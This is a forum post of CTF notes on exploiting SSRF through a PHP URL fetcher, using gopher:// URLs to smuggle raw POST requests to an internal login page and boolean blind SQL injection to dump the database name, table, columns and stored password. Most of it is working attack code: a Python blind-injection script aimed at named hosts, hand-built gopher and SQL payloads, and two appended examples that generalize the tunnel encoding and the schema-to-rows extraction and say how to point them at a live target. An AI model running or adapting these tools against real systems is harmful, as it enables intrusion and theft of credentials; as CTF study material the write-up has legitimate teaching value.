Views: 19160 | Replies: 4

Notes on SSRF and the gopher protocol

Posted 2016-11-16 11:41:30
The forum hasn't had much substantive content lately, so I'm padding it out with something I wrote a while ago.
A CTF challenge

It's pretty obvious: the server side presumably uses PHP to take the URL you submit and then fetches it itself. SSRF, so start by scanning the IP range for live hosts.

Just iterate from 1 to 254 with Burp. It turned out .1 is up, and so is .166. Port-scanning .166 showed port 80 open.
[Python]
#coding=utf-8
# SSRF blind-injection script: every probe is a POST to the internal login page,
# tunnelled through the vulnerable index.php?url= fetcher as a gopher:// URL.
import string
from urllib.parse import quote

import requests

SSRF = 'http://web5.08067.me/index.php?url='
TARGET = '172.16.181.166'

chars = []
def getchars():
    global chars
    chars = list(string.ascii_lowercase)
    for i in range(0, 10):
        chars.append(str(i))
    chars += ['@', '_', '.', '-', '\\']
    return chars

def gopher_post(body):
    # Raw POST to the login page. Content-Length is computed from the real body;
    # the hand-counted values in the original were one byte too large.
    raw = ('POST /admin/wllmctf_login.php HTTP/1.1\r\n'
           'Host: %s\r\n'
           'Content-Length: %d\r\n'
           'Content-Type: application/x-www-form-urlencoded\r\n'
           '\r\n%s') % (TARGET, len(body), body)
    # Encode once for gopher (curl URL-decodes the selector before writing it to
    # the socket), then once more because the whole gopher URL sits inside the
    # ?url= query string and PHP decodes it once.
    gopher = 'gopher://%s:80/_%s' % (TARGET, quote(raw, safe=''))
    return SSRF + quote(gopher, safe='')

def probe(condition):
    # True when the injected condition holds: the login page answers
    # 'error names' only when no row matched the username, and
    # 'password error' when the (injected) username condition was true.
    body = "username=admin' and (%s) and '1'='1&password=2333" % condition
    return 'error names' not in requests.get(gopher_post(body)).text

def checklength():
    for i in range(0, 9):
        if probe('(SELECT length(database()))=%d' % i):
            print('database name length is %d' % i)
            return i

def checkdatabase(dblength):
    result = ''
    for i in range(1, dblength + 1):  # position i (the original always read position 1)
        for char in chars:
            if probe("(select mid(database(),%d,1))='%s'" % (i, char)):
                result += char
                print(result)
                break
    return result

def checkdata():
    result = ''
    for i in range(1, 33):
        for char in chars:
            if probe("(select mid((select password from ssrf limit 0,1),%d,1))='%s'" % (i, char)):
                result += char
                print(result)
                break
    return result

if __name__ == '__main__':
    getchars()
    checkdata()
    #checklength()
    #checkdatabase(7)


gopher notes

Capturing a login with Burp

The captured POST:
POST /admin/wllmctf_login.php HTTP/1.1
Host: 172.16.181.166
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
username=ss&password=xiaozhang123
(I removed headers like the UA and cookies to keep it simple)
To build the gopher URL, replace each line break with %0d%0a:
gopher://172.16.181.166:80/_POST/admin/wllmctf_login.php HTTP/1.1%0d%0aHost: 172.16.181.166%0d%0aContent-Length: 35%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ausername=admin&password=xiaozhang123



Just jotting things down; uploading screenshots is a hassle. I don't feel like writing more.

Oh, and the password was obtained by injection, blind injection: first extract the table name, then the column names, then the contents. You can use the payloads below to adapt the Python script above.



POST /wllmctf_login.php HTTP/1.1
Host: 172.16.181.166
User-Agent: curl/7.43.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
log=admin&pwd=12345
gopher://172.16.181.166:80/_POST /wllmctf_login.php HTTP/1.1%0d%0aHost: 172.16.181.166%0d%0aUser-Agent: curl/7.43.0%0d%0aAccept: */*%0d%0aAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%0d%0aAccept-Encoding: gzip, deflate%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0aContent-Length: 117
gopher%3A%2f%2f172.16.181.166%3A80%2f_%250aPOST%2520%2Fadmin%2fwllmctf_login.php%2520HTTP%252f1.1%250d%250aHost%253a%2520127.0.0.1%250d%250aContent-Length%253a%252035%250a%250aContent-Type%253A%2520application%252fx-www-form-urlencoded%250d%250a%250d%250ausername%253dss%2526password%253dxiaozhang123
gopher%3a%2f%2f172.16.181.166%3a80%2f_%250aPOST%2520%2fadmin%2fwllmctf_login.php%2520HTTP%252f1.1%250d%250aHost%253a%2520127.0.0.1%250d%250aContent-Length%253a%252035%250d%250aContent-Type%%253a%2520application%252fx-www-form-urlencoded%250d%250a%250d%250ausername%3dss%26password%3dxiaozhang123
gopher://172.16.181.166:80/_POST /admin/wllmctf_login.php HTTP/1.1%0d%0aHost: 172.16.181.166%0d%0aContent-Length: 52%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ausername=admin'xor sleep(20)#&password=xiaozhang123
username=admin'and 1=1#&password=xiaozhang123
username=admin' and '1'='1&password=xiaozhang123
username=admin' and (select LENGTH(database()))=4#
username=admin' and (SELECT length(database()))=4 and '1'='1&password=2333
database length is 7
database name
wllmctf
username=admin' and (select mid((database()),1,1))='t' and '1'='1&password=2333
table name
ssrf
username=admin' and (select mid(((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1))='m' and '1'='1&password=2333
column names
username
password
username=admin' and (select mid(((select column_name from information_schema.columns where table_name=0x73737266 limit 0,1)),1,1))='m' and '1'='1&password=2333
contents
username=admin' and (select mid(((select password from ssrf limit 0,1)),1,1))='m' and '1'='1&password=2333
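The gopher construction from the notes above, written out as an added worked example (this is not code from the post). It assumes the fetcher behaves as the post describes: PHP takes the `?url=` value, decodes it once and hands it to curl, and the addresses are the post's own. The encoder percent-encodes every byte of the raw request (CR/LF, spaces, quotes and `?`) and wraps it once for gopher and once more for the outer `?url=` parameter; the decoder does what libcurl's gopher code does on the way out: it drops the item-type byte after the `/` (that is why the `_` is there), turns a literal `?` into a TAB, URL-decodes the selector and then sends it followed by CRLF. The Content-Length check is the part hand-built payloads get wrong: the gopher URL in the notes declares 35 bytes for the 36-byte body `username=admin&password=xiaozhang123`, so the server would see the password as `xiaozhang12`, and the hand-counted values in the post's original script were one byte too large for single-digit positions, which only worked because the CR that curl appends after the selector was swallowed as the last byte of the (already wrong) password field.

```python
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Addresses from the post; the fetcher is assumed to pass ?url= to curl unchanged.
SSRF_ENDPOINT = "http://web5.08067.me/index.php"
TARGET_HOST = "172.16.181.166"


def build_post(path, host, body):
    """Raw POST as bytes, with Content-Length taken from the real body."""
    body = body.encode()
    return (b"POST %s HTTP/1.1\r\nHost: %s\r\nContent-Length: %d\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n\r\n%s"
            % (path.encode(), host.encode(), len(body), body))


def to_gopher(raw_request, host, port=80):
    """Wrap raw request bytes in a gopher:// URL. Every byte is percent-encoded
    (safe="") so CR/LF, spaces, quotes and '?' all survive curl's handling."""
    return "gopher://%s:%d/_%s" % (host, port, quote(raw_request, safe=""))


def wrap_for_ssrf(gopher_url):
    """Second layer: the gopher URL is itself a query-string value and PHP decodes
    it once before curl sees it, so %0d%0a has to go in as %250d%250a."""
    return SSRF_ENDPOINT + "?url=" + quote(gopher_url, safe="")


def unwrap_gopher(gopher_url):
    """What curl writes to the socket for a gopher URL: (host, port, bytes).
    Mirrors libcurl's gopher.c: drop the item-type byte after '/', turn a
    literal '?' into TAB (the gopher search separator), then URL-decode the
    selector. curl then sends these bytes followed by CRLF."""
    m = re.fullmatch(r"gopher://([^/:]+)(?::(\d+))?/(.*)", gopher_url, re.S)
    if not m:
        raise ValueError("not a gopher URL: %r" % gopher_url)
    host, port, path = m.group(1), int(m.group(2) or 70), m.group(3)
    selector = path[1:].replace("?", "\t")
    return host, port, unquote(selector, encoding="latin-1").encode("latin-1")


def unwrap_ssrf(outer_url):
    """Peel both layers off a full index.php?url=... request."""
    gopher_url = parse_qs(urlsplit(outer_url).query)["url"][0]  # PHP-style decode
    return unwrap_gopher(gopher_url)


def check_content_length(raw_request):
    """(declared Content-Length, real body length). Too small truncates the
    form data; too large leaves the server waiting for bytes that never come."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    declared = None
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            declared = int(value.strip())
    return declared, len(body)


# The gopher URL hand-built in the notes above, copied verbatim.
POST_GOPHER_URL = ("gopher://172.16.181.166:80/_POST /admin/wllmctf_login.php HTTP/1.1"
                   "%0d%0aHost: 172.16.181.166%0d%0aContent-Length: 35%0d%0a"
                   "Content-Type: application/x-www-form-urlencoded%0d%0a%0d%0a"
                   "username=admin&password=xiaozhang123")

if __name__ == "__main__":
    print(check_content_length(unwrap_gopher(POST_GOPHER_URL)[2]))  # (35, 36)
    req = build_post("/admin/wllmctf_login.php", TARGET_HOST,
                     "username=admin' and (SELECT length(database()))=7 and '1'='1&password=2333")
    outer = wrap_for_ssrf(to_gopher(req, TARGET_HOST))
    print(outer)
    print(unwrap_ssrf(outer)[2].decode())
```

Run `unwrap_ssrf` on any payload before firing it: what comes back is byte-for-byte what the internal server will read, which is the cheapest way to catch a mis-counted Content-Length or a stray `?` that curl would turn into a tab.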
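The blind-injection chain listed at the end of the post (database name, then the table name from information_schema.tables, then the column names from information_schema.columns, then the row contents), generalized into one extraction routine. This is an added example, not the author's script. Instead of a live target it runs against a constructed in-memory SQLite stand-in (an attached database named information_schema, with MySQL's database() and mid() supplied as user functions, and a made-up admin row) so the loop can be exercised offline; the login page's behaviour is assumed from the two responses the script keys on, 'error names' when no row matches the username and 'password error' when one does. Two MySQL differences to keep in mind when pointing it at the real thing: SQLite compares strings case-sensitively while MySQL's default collation does not (which is why a lowercase alphabet was enough in the CTF), and the 0x73737266 hex literal the post uses for 'ssrf' is a MySQL string literal, so the quoted name is used here. The column and row counts are recovered through the oracle as well rather than guessed.

```python
import sqlite3
import string

# Lower-case alphabet as in the post. MySQL's default collation is case-insensitive,
# SQLite's '=' is not, so the constructed data below is lower-case too.
ALPHABET = string.ascii_lowercase + string.digits + "@_.-"


def make_fake_target():
    """Constructed in-memory stand-in for the CTF's MySQL database (not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ssrf (username TEXT, password TEXT)")
    db.execute("INSERT INTO ssrf VALUES ('admin', 'xiaozhang123')")
    # MySQL's information_schema, approximated by an attached database.
    db.execute("ATTACH ':memory:' AS information_schema")
    db.execute("CREATE TABLE information_schema.tables (table_schema TEXT, table_name TEXT)")
    db.execute("INSERT INTO information_schema.tables VALUES ('wllmctf', 'ssrf')")
    db.execute("CREATE TABLE information_schema.columns (table_name TEXT, column_name TEXT)")
    db.executemany("INSERT INTO information_schema.columns VALUES (?, ?)",
                   [("ssrf", "username"), ("ssrf", "password")])
    # MySQL functions the payloads rely on.
    db.create_function("database", 0, lambda: "wllmctf")
    db.create_function("mid", 3, lambda s, pos, n: (s or "")[pos - 1:pos - 1 + n])
    return db


def login(db, username, password):
    """Login page as the post's payloads imply it: deliberately vulnerable string
    concatenation on the username, then a separate password comparison, which is
    what turns 'error names' vs 'password error' into a boolean oracle."""
    row = db.execute("SELECT password FROM ssrf WHERE username='%s'" % username).fetchone()
    if row is None:
        return "error names"
    if row[0] != password:
        return "password error"
    return "login ok"


def make_oracle(db):
    """True when the injected condition is true for the admin row."""
    def oracle(condition):
        injected = "admin' and (%s) and '1'='1" % condition
        return login(db, injected, "2333") == "password error"
    return oracle


def extract_int(oracle, expr, limit=64):
    """Recover a small integer expression (a length or a count) by linear probing."""
    for n in range(limit + 1):
        if oracle("(%s)=%d" % (expr, n)):
            return n
    raise ValueError("value of %s exceeds %d" % (expr, limit))


def extract_str(oracle, expr, alphabet=ALPHABET):
    """Length first, then one character per position, as the post's script does."""
    length = extract_int(oracle, "length(%s)" % expr)
    out = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if oracle("mid(%s,%d,1)='%s'" % (expr, pos, ch)):
                out += ch
                break
        else:
            raise ValueError("character %d of %s is outside the alphabet" % (pos, expr))
    return out


def dump(oracle):
    """The post's chain end to end: schema -> table -> columns -> rows."""
    schema = extract_str(oracle, "database()")
    table = extract_str(oracle, "(select table_name from information_schema.tables "
                                "where table_schema=database() limit 0,1)")
    ncols = extract_int(oracle, "(select count(*) from information_schema.columns "
                                "where table_name='%s')" % table)
    cols = [extract_str(oracle, "(select column_name from information_schema.columns "
                                "where table_name='%s' limit %d,1)" % (table, i))
            for i in range(ncols)]
    nrows = extract_int(oracle, "(select count(*) from %s)" % table)
    rows = [[extract_str(oracle, "(select %s from %s limit %d,1)" % (col, table, r))
             for col in cols] for r in range(nrows)]
    return {"database": schema, "table": table, "columns": cols, "rows": rows}


if __name__ == "__main__":
    print(dump(make_oracle(make_fake_target())))
```

To use it against the real target, replace `make_oracle` with one that sends each condition through the gopher tunnel and returns whether 'error names' is absent from the response; everything above it stays the same.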

Posted 2016-11-16 14:26:16
Honestly, I didn't understand what you were trying to describe at the start...
I only got it after reading your code. So awkward.


OP | Posted 2016-11-16 15:23:22

RE: Notes on SSRF and the gopher protocol

90_ posted on 2016-11-16 14:26:
Honestly, I didn't understand what you were trying to describe at the start...
I only got it after reading your code. So awkward ...

They're notes, so they're fairly loose.

Posted 2016-11-16 22:18:43
Way out of my depth, but trying hard to keep up.

Posted 2016-11-21 10:32:35
Took me ages, but I finally understood what this is about.